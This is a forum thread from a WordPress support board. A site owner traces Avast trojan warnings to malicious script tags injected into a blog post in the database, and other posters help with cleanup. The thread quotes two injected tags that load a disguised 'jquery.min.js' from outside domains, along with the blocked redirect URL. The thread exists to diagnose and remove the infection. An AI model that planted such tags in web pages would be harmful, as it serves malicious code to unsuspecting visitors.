Posted 1 year ago #
The last 3 days, when visiting one of my sites (http://www.bullsource.com), I've received an virus warning from Avast containing this info:
http://edisonsbar.com/in.cgi?4|>{gzip} [L] HTML:RedirME-inf [Trj] (0)
I've only been able to replicate this once per day. I searched this on Google and found this: http://jsunpack.jeek.org/dec/go?report=226656eee9412647c8c49c892e9473200486e1eb.
Does anyone know what this means?
Posted 1 year ago #
I was able to reproduce the issue again.
When visiting the site, my virus protection program, Avast shows this message:
TROJAN HORSE BLOCKED
avast Web Shield has blocked a threat. No further action is required.
Object: http://edisonsbar.com/in.cgi?4|>{gzip}
Infection: HTML:RedirME-inf [Trj]
Action: Connection aborted
Process: C:\Program Files\Mozilla\Firefox\firefox.exe
The threat was detected and blocked while downloading an item from the web.
Posted 1 year ago #
This is happening on one of my other WordPress sites (on the same server). I noticed that this malicious code was being inserted into the index page within the code of the first blog post:
<h5><script src=http://maroon.karenegren.com/js/jquery.min.js></script></h5>
and
<h5><script src=http://yellow.gaindirectory.org/js/jquery.min.js></script></h5>
I never added this code and it's not in the template file of the theme.
I believe this is part of a current hack that is injecting code into all PHP files (not just WordPress) on a few shared hosting providers. Remain calm and carefully follow this guide:
Posted 1 year ago #
My non-WordPress sites (on the same server) are unaffected. I contacted the hosting provider (mt) and they haven't had any other reports of this.
Posted 1 year ago #
It appears that the hack was injected into the database, not the PHP files. The malicious code was added to a blog post.
Remove the code from the post, then run through this guide to make sure that nothing else is wrong:
http://codex.wordpress.org/FAQ_My_site_was_hacked
When you're done, implement some (if not all) of the recommended security measures:
Posted 1 year ago #
Do you know of a good plugin to install for security? The recommended ones seem to be outdated and I was experiencing issues with Secure WordPress.
I honestly don't recommend any of them. Most of the current security plugins simply scan for "vulnerabilities" and the rest simply provide a software method of implementing the recommended security measures. If you used a plugin like that, all a hacker would have to do is reset your plugins to drop all of your security measures. It's better to follow the guide that I linked to and manually implement the security measures.
Posted 1 year ago #
Thanks.
You're welcome!
This topic has been closed to new replies.
